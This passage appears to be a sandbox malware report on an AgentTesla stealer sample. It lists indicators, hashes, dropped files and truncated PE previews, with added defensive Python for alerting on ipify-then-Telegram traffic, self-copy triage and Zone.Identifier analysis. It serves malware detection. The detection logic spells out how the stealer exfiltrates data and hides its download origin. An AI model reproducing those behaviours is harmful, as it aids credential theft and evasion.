3b5074b1b5d032e5620f69f9f700ff0e | PO2023#PREORDER.PDF.exe | malicious | AgentTesla | 149.154.167.220, 64.185.227.155, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | PO_340166.exe | malicious | AgentTesla | 149.154.167.220, 64.185.227.155, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | PO_IN34023.exe | malicious | AgentTesla, zgRAT | 149.154.167.220, 64.185.227.155, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | 2303-64687.exe | malicious | AgentTesla | 149.154.167.220, 64.185.227.155, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | Product_specifications.exe | malicious | AgentTesla | 149.154.167.220, 64.185.227.155, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | REQUEST_FOR_QUOTE_1603023.exe | malicious | AgentTesla, zgRAT | 149.154.167.220, 64.185.227.155, 173.231.16.76
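The network Match tables above combine three weak indicators: the ipify lookup (api.ipify.org, api4.ipify.org and the addresses they resolved to), Telegram's API addresses (149.154.167.220 and 149.154.167.99, which the TELEGRAMRU rows show are also used by unrelated Djvu/Vidar droppers) and the 3b5074b1b5d032e5620f69f9f700ff0e fingerprint, which the last table shows on HTML phishing pages, a zip and an Xmrig sample as well. None of them is a detection on its own; what every AgentTesla row in the last table has in common is the ipify addresses alongside 149.154.167.220 from the same sample. The following is an added detection example, not part of the Joe Sandbox report: Python that tags per-connection telemetry with those indicators and only raises a high-severity alert when one process does the ipify lookup and then contacts a Telegram address within a short window. The JSON-lines telemetry format, the sample records, the five-minute window and the scoring weights are all assumptions.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Indicators taken from the Match tables above.
IPIFY_HOSTS = {"api.ipify.org", "api4.ipify.org"}
IPIFY_IPS = {"64.185.227.155", "104.237.62.211", "173.231.16.76"}
TELEGRAM_IPS = {"149.154.167.220", "149.154.167.99"}
JA3_SEEN = "3b5074b1b5d032e5620f69f9f700ff0e"

# Constructed per-connection telemetry (assumed JSON-lines export from an EDR or proxy;
# not from the report). pid 4412 reproduces the report's pattern, pid 7120 is a desktop
# Telegram client, pid 3300 is an administrator checking the egress address.
SAMPLE_EVENTS = r"""
{"ts": "2023-03-22T18:32:28Z", "pid": 4412, "image": "C:\\Users\\user\\Desktop\\PSFBGrvmxy.exe", "dst_ip": "64.185.227.155", "host": "api4.ipify.org", "ja3": "3b5074b1b5d032e5620f69f9f700ff0e"}
{"ts": "2023-03-22T18:32:31Z", "pid": 4412, "image": "C:\\Users\\user\\Desktop\\PSFBGrvmxy.exe", "dst_ip": "149.154.167.220", "host": "api.telegram.org", "ja3": "3b5074b1b5d032e5620f69f9f700ff0e"}
{"ts": "2023-03-22T18:40:02Z", "pid": 7120, "image": "C:\\Users\\user\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe", "dst_ip": "149.154.167.99", "ja3": "0d5e8a1b6f4c2d3e9a7b8c6d5e4f3a2b"}
{"ts": "2023-03-22T18:41:15Z", "pid": 3300, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "dst_ip": "104.237.62.211", "host": "api.ipify.org", "ja3": "3b5074b1b5d032e5620f69f9f700ff0e"}
"""


def parse_events(text: str) -> list:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def tag(ev: dict) -> set:
    """Match one connection record against the indicator sets."""
    tags = set()
    if ev.get("host") in IPIFY_HOSTS or ev.get("dst_ip") in IPIFY_IPS:
        tags.add("ipify")
    if ev.get("dst_ip") in TELEGRAM_IPS:
        tags.add("telegram")
    if ev.get("ja3") == JA3_SEEN:
        tags.add("ja3")
    return tags


def correlate(events: list, window: timedelta = timedelta(minutes=5)) -> list:
    """Score indicators per process; the ipify-then-Telegram sequence carries the weight."""
    by_proc = defaultdict(list)
    for ev in events:
        ts = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        by_proc[(ev["pid"], ev["image"])].append((ts, tag(ev)))

    alerts = []
    for (pid, image), evs in by_proc.items():
        evs.sort(key=lambda e: e[0])
        ipify_ts = [ts for ts, t in evs if "ipify" in t]
        telegram_ts = [ts for ts, t in evs if "telegram" in t]
        score, reasons = 0, []
        if ipify_ts:
            score += 1
            reasons.append("external IP lookup via ipify")
        if telegram_ts:
            score += 1
            reasons.append("connection to Telegram API address")
        # Order matters: the lookup must come first, and Telegram must follow within the window.
        sequence = any(timedelta(0) <= t_tg - t_ip <= window
                       for t_ip in ipify_ts for t_tg in telegram_ts)
        if sequence:
            score += 2
            reasons.append(f"ipify lookup followed by Telegram within {window}")
        # The JA3 hash is generic (the report shows it on unrelated samples), so it only
        # corroborates once another indicator has already fired.
        if score and any("ja3" in t for _, t in evs):
            score += 1
            reasons.append("JA3 matches the report's fingerprint")
        if score:
            severity = "high" if sequence else ("medium" if score >= 2 else "low")
            alerts.append({"pid": pid, "image": image, "score": score,
                           "severity": severity, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in correlate(parse_events(SAMPLE_EVENTS)):
        print(f"{a['severity']:6} score={a['score']} pid={a['pid']} {a['image']}")
        for r in a["reasons"]:
            print(f"       - {r}")
```

Keyed on (pid, image) the correlation survives the injection the report describes only if the telemetry attributes connections to the injected-into process; when hunting across a fleet, key on host and a short time window instead, and treat a medium alert from a non-browser process as a triage lead rather than noise.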
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | New_Order_M2023SI3.xls | malicious | AgentTesla |
C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | New_Order_M2023SI3.xls | malicious | AgentTesla |
                                                                                      Process:C:\Users\user\Desktop\PSFBGrvmxy.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):1459
                                                                                      Entropy (8bit):5.3420905847574325
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                                                                      MD5:FB4B7720101F874710FF986326F7980F
                                                                                      SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                                                                      SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                                                                      SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
                                                                                      Malicious:true
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut
                                                                                      Process:C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1459
                                                                                      Entropy (8bit):5.3420905847574325
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                                                                      MD5:FB4B7720101F874710FF986326F7980F
                                                                                      SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                                                                      SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                                                                      SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
Malicious:false
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut

Process:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1459
Entropy (8bit):5.3420905847574325
Encrypted:false
SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
MD5:FB4B7720101F874710FF986326F7980F
SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
Malicious:false
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):5829
Entropy (8bit):4.902247628650607
Encrypted:false
SSDEEP:96:3CJ2Woe5F2k6Lm5emmXIGegyg12jDs+un/iQLEYFjDaeWJ6KGcmXs9smEFRLcU6j:Wxoe5FVsm5emdzgkjDt4iWN3yBGHc9s8
MD5:F948233D40FE29A0FFB67F9BB2F050B5
SHA1:9A815D3F218A9374788F3ECF6BE3445F14B414D8
SHA-256:C18202AA4EF262432135AFF5139D0981281F528918A2EEA3858B064DFB66BE4F
SHA-512:FD86A2C713FFA10FC083A34B60D7447DCB0622E83CC5992BBDAB8B3C7FEB7150999A68A8A9B055F263423478C0879ED462B7669FDE7067BC829D79DD3974787C
Malicious:false
Preview:PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):15672
Entropy (8bit):5.555889624199822
Encrypted:false
SSDEEP:384:OtmDGA7Tx2x+JsSBxnajilr3bsFvDNnyYr:vJ2is4xamlrIvLr
MD5:B6D2772CCD6974A35D4809B32671BC90
SHA1:CE3347922895C5D4453856BDFBFCA6714386D7A2
SHA-256:5791717E2F855E3A275A07B42E611B1754A198BD63CCEE7796A8EA005633B53D
SHA-512:C84322D61417F49F0D7ABD5A290CDA6481926356C2AA160E1BAD19C4B676C3E3B9B4637385007D965D4FB63104ED7A135EC04234F6A7CA5184D6460D34347939
Malicious:false
Preview:@...e...........7.......z...Z.U.U...r.v...]..........@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..4....................].D.E.............System.Data.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServicesH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview:1

Seven further 1-byte files with the same content ("1"), the same hashes and the same metadata are dropped by powershell.exe in this run; each is a separate file entry in the report.

Process:C:\Users\user\Desktop\PSFBGrvmxy.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):1824768
Entropy (8bit):5.289569527879816
Encrypted:false
SSDEEP:24576:wBlb49Ot09OX7l348A5NyMWHqTdSoQgcld11rzA11CKKoA5+BtxCEM2D9BgEm41p:cd40xz1foxCsBAfVZa
MD5:C4B59F8E80A1289B9202A33DA41D7D94
SHA1:9E50BC56372BD9F6C8CCCF4C284BC373FDE319F0
SHA-256:66D51327BAB933EDA9D755EB691E584FCB324B04C573D1BE50D634C7297134F8
SHA-512:217D6E2DA7C7D8C0421200EE8EE9568BBDD0D4F650758F576E4E9A60225AD30A1AAF92A6617864F9BFAAAE0AF87AA6E6CE82E927C571316F96CF72B652363048
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 67%
Joe Sandbox View:
• Filename: New_Order_M2023SI3.xls, Detection: malicious
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d............................^.... ........@.. .......................@............`.....................................K............................ ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................@.......H.......8...........F...@/..............................................N.(.....,.+.(!...+.*Ns.....-.&+......+.*.(....,...s%....-.&+.(....+.*...-.&&+.(....+.*.(....,....s?....-.&+.(....+.*....,.&&&+.(....+.*.(....,..s5....,.&+.(....+.*.(....&*.(....,..sV....-.&+.(....+.*..-.&+.(....+.*.(....,..sG....-.&+.(....+.*...-.&&+.(....+.*.(....,...s8....-.&+.(....+.*...-.&&+.(....+.*n(....,..sO....-.&+.(....+.*.(....,...s#....-.&+.(....+.*...-.&&+.(....+.*F...-.&(....+.&+.*F...-.&(...

Process:C:\Users\user\Desktop\PSFBGrvmxy.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Preview:[ZoneTransfer]....ZoneId=0

Process:C:\Users\user\Desktop\PSFBGrvmxy.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):1824768
Entropy (8bit):5.289569527879816
Encrypted:false
SSDEEP:24576:wBlb49Ot09OX7l348A5NyMWHqTdSoQgcld11rzA11CKKoA5+BtxCEM2D9BgEm41p:cd40xz1foxCsBAfVZa
MD5:C4B59F8E80A1289B9202A33DA41D7D94
SHA1:9E50BC56372BD9F6C8CCCF4C284BC373FDE319F0
SHA-256:66D51327BAB933EDA9D755EB691E584FCB324B04C573D1BE50D634C7297134F8
SHA-512:217D6E2DA7C7D8C0421200EE8EE9568BBDD0D4F650758F576E4E9A60225AD30A1AAF92A6617864F9BFAAAE0AF87AA6E6CE82E927C571316F96CF72B652363048
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 67%
Joe Sandbox View:
• Filename: New_Order_M2023SI3.xls, Detection: malicious
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d............................^.... ........@.. .......................@............`.....................................K............................ ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................@.......H.......8...........F...@/..............................................N.(.....,.+.(!...+.*Ns.....-.&+......+.*.(....,...s%....-.&+.(....+.*...-.&&+.(....+.*.(....,....s?....-.&+.(....+.*....,.&&&+.(....+.*.(....,..s5....,.&+.(....+.*.(....&*.(....,..sV....-.&+.(....+.*..-.&+.(....+.*.(....,..sG....-.&+.(....+.*...-.&&+.(....+.*.(....,...s8....-.&+.(....+.*...-.&&+.(....+.*n(....,..sO....-.&+.(....+.*.(....,...s#....-.&+.(....+.*...-.&&+.(....+.*F...-.&(....+.&+.*F...-.&(...
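The two PE entries above carry exactly the size and hashes of the submitted sample, which is how a self-copy into the user profile shows up in a dropped-file table. The Python below is an added example, not Joe Sandbox's own code: it recomputes the fields the report prints for a file (size, 8-bit Shannon entropy, MD5/SHA-1/SHA-256/SHA-512) and flags dropped files whose SHA-256 equals the sample's. The inputs are constructed: the 1-byte file from the powershell.exe entries, a 26-byte Zone.Identifier stream laid out like the report's preview (the exact CRLF placement is assumed), and a record for the 1.8 MB PE that carries only the SHA-256, size and entropy the report lists, since the binary itself is not embedded. The packed-file entropy threshold is a rule of thumb, not something the report states.

```python
"""Recompute the per-file fields a sandbox report prints and flag dropped
files that are byte-identical to the submitted sample.

Added example, not Joe Sandbox code. Small inputs are constructed from
the report's previews; the 1.8 MB PE is represented only by the SHA-256
the report lists for it.
"""
import hashlib
import math
from collections import Counter

# Submitted sample as identified in the report (SHA-256 upper-cased like the dropped-file table).
SAMPLE_SHA256 = "66D51327BAB933EDA9D755EB691E584FCB324B04C573D1BE50D634C7297134F8"
SAMPLE_EXE = r"C:\Users\user\Desktop\PSFBGrvmxy.exe"

# Rule of thumb: entropy this close to 8 bits/byte usually means packed or encrypted content.
PACKED_ENTROPY = 7.2


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0); the report's 'Entropy (8bit)' field."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def describe_bytes(data: bytes) -> dict:
    """The same fields the report prints for a file, with upper-case hex digests."""
    return {
        "size": len(data),
        "entropy": shannon_entropy_8bit(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


def triage(records, sample_sha256=SAMPLE_SHA256, sample_exe=SAMPLE_EXE):
    """Normalise dropped-file records and attach triage flags.

    A record has 'process' (the writer) and either 'data' (bytes, hashed here)
    or precomputed 'sha256'/'size'/'entropy' copied from a report.
    Flags:
      self-copy          SHA-256 equals the submitted sample: the sample wrote a copy of itself
      written-by-sample  the writer is the sample process
      high-entropy       at or above PACKED_ENTROPY, worth a packer/crypter check
    """
    out = []
    for rec in records:
        if "data" in rec:
            info = describe_bytes(rec["data"])
        else:
            info = {"size": rec["size"], "entropy": rec.get("entropy", 0.0),
                    "sha256": rec["sha256"].upper()}
        flags = []
        if info["sha256"] == sample_sha256.upper():
            flags.append("self-copy")
        if rec["process"].lower() == sample_exe.lower():
            flags.append("written-by-sample")
        if info["entropy"] >= PACKED_ENTROPY:
            flags.append("high-entropy")
        out.append({"process": rec["process"], **info, "flags": flags})
    return out


# Constructed inputs mirroring the report's dropped-file entries.
POWERSHELL = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
DROPPED = [
    {"process": POWERSHELL, "data": b"1"},                                # the 1-byte files
    {"process": SAMPLE_EXE, "data": b"[ZoneTransfer]\r\nZoneId=0\r\n"},  # 26-byte ADS, CRLF layout assumed
    {"process": SAMPLE_EXE, "sha256": SAMPLE_SHA256, "size": 1824768,
     "entropy": 5.289569527879816},                                      # the self-copy, values from the report
]

if __name__ == "__main__":
    for row in triage(DROPPED):
        print(row["size"], row["sha256"][:16], round(row["entropy"], 4), row["flags"])
```

For the 1-byte file the computed MD5, SHA-1 and SHA-256 are the well-known digests of the single character 1 and match the report's values exactly. The constructed Zone.Identifier stream reproduces the report's entropy of 3.95006375643621 because entropy depends only on the byte histogram, not on where the line breaks sit; its MD5 is deliberately not compared with the report's, since the preview does not fix the original's CRLF placement.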

Process:C:\Users\user\Desktop\PSFBGrvmxy.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Preview:[ZoneTransfer]....ZoneId=0
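The two 26-byte Zone.Identifier entries above, written by the sample itself with ZoneId=0, are what the signature "Hides that the sample has been downloaded from the Internet (zone.identifier)" refers to. A file that arrived from the Internet normally carries ZoneId=3 in this alternate data stream, and SmartScreen and Office Protected View key off that mark, so a dropper that stamps ZoneId=0 (Local Machine) onto its own copy removes the Mark-of-the-Web before the copy is launched from an autostart location. The Python below is an added example, not Joe Sandbox code: a tolerant parser for the [ZoneTransfer] section and a verdict function that weighs the zone against which process wrote the file. The streams, the browser list and the process paths are constructed; the ZoneId=0 stream follows the report's 26-byte preview with the CRLF placement assumed, and the ZoneId=3 stream is the shape a browser writes, with ReferrerUrl and HostUrl.

```python
"""Parse a Zone.Identifier alternate data stream and judge whether the
Mark-of-the-Web on a dropped file fits the process that wrote it.

Added example, not Joe Sandbox code. Streams, browser list and paths are
constructed; ZONE0 follows the report's 26-byte preview, ZONE3 is the
shape a browser writes.
"""

ZONE_NAMES = {0: "LocalMachine", 1: "LocalIntranet", 2: "TrustedSites",
              3: "Internet", 4: "RestrictedSites"}

# Processes that legitimately stamp ZoneId=3 on what they save (assumed list; extend per estate).
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe", "outlook.exe"}


def parse_zone_identifier(stream: bytes) -> dict:
    """Tolerant INI parse of the [ZoneTransfer] section.

    Accepts CRLF or LF, blank lines, stray whitespace and either case in keys.
    Returns {} when the section is absent; ZoneId as int (None if not numeric),
    other keys such as ReferrerUrl/HostUrl as str.
    """
    fields, in_section = {}, False
    for raw in stream.decode("utf-8", errors="replace").splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "zonetransfer"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            key, value = key.strip(), value.strip()
            if key.lower() == "zoneid":
                fields["ZoneId"] = int(value) if value.isdigit() else None
            else:
                fields[key] = value
    return fields


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def motw_verdict(stream, writer_process: str, sample_process: str) -> str:
    """Classify the MOTW state of one dropped file.

    stream          bytes of the Zone.Identifier ADS, or None when the file has none
    writer_process  path of the process that wrote the file (the report's Process: field)
    sample_process  path of the submitted sample
    """
    if stream is None:
        return "no-motw"                        # nothing for SmartScreen / Protected View to act on
    zone = parse_zone_identifier(stream).get("ZoneId")
    writer, sample = _basename(writer_process), _basename(sample_process)
    if zone is None:
        return "malformed"                      # no [ZoneTransfer] section or non-numeric ZoneId
    if zone == 3 and writer in BROWSERS:
        return "internet-download"              # the normal way a file gets ZoneId=3
    if zone in (0, 1, 2) and writer == sample:
        return "motw-suppressed-by-sample"      # the report's case: the sample stamps ZoneId=0 on its own copy
    return "zone-" + ZONE_NAMES.get(zone, str(zone))


# Constructed streams. ZONE0 is 26 bytes like the report's file; the exact CRLF placement is assumed.
ZONE0 = b"[ZoneTransfer]\r\nZoneId=0\r\n"
ZONE3 = (b"[ZoneTransfer]\r\nZoneId=3\r\n"
         b"ReferrerUrl=https://example.test/\r\n"
         b"HostUrl=https://example.test/file.exe\r\n")
SAMPLE = r"C:\Users\user\Desktop\PSFBGrvmxy.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"

if __name__ == "__main__":
    print(motw_verdict(ZONE0, SAMPLE, SAMPLE))   # motw-suppressed-by-sample
    print(motw_verdict(ZONE3, CHROME, SAMPLE))   # internet-download
```

On a live host the stream contents come from the file's `:Zone.Identifier` alternate data stream (in PowerShell, `Get-Content -Stream Zone.Identifier`), and the writer comes from file-creation telemetry such as Sysmon Event ID 15, which logs exactly this stream being created. A ZoneId=3 stream written by a non-browser, or the report's ZoneId=0 written by the sample on its own copy, is the signal; a file with no stream at all is normal for locally created files and only interesting when its hash matches something that came from the Internet.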

File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):5.289569527879816
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name:PSFBGrvmxy.exe
File size:1824768
MD5:c4b59f8e80a1289b9202a33da41d7d94
SHA1:9e50bc56372bd9f6c8cccf4c284bc373fde319f0
SHA256:66d51327bab933eda9d755eb691e584fcb324b04c573d1be50d634c7297134f8
SHA512:217d6e2da7c7d8c0421200ee8ee9568bbdd0d4f650758f576e4e9a60225ad30a1aaf92a6617864f9bfaaae0af87aa6e6ce82e927c571316f96cf72b652363048
SSDEEP:24576:wBlb49Ot09OX7l348A5NyMWHqTdSoQgcld11rzA11CKKoA5+BtxCEM2D9BgEm41p:cd40xz1foxCsBAfVZa
TLSH:AF854CF25193FEC5D72F1D44D5083B909C00186767AC869CFCCA269793E95A4EFACAB0
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d............................^.... ........@.. .......................@............`................................
Icon Hash:00828e8e8686b000
Entrypoint:0x5bed5e
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
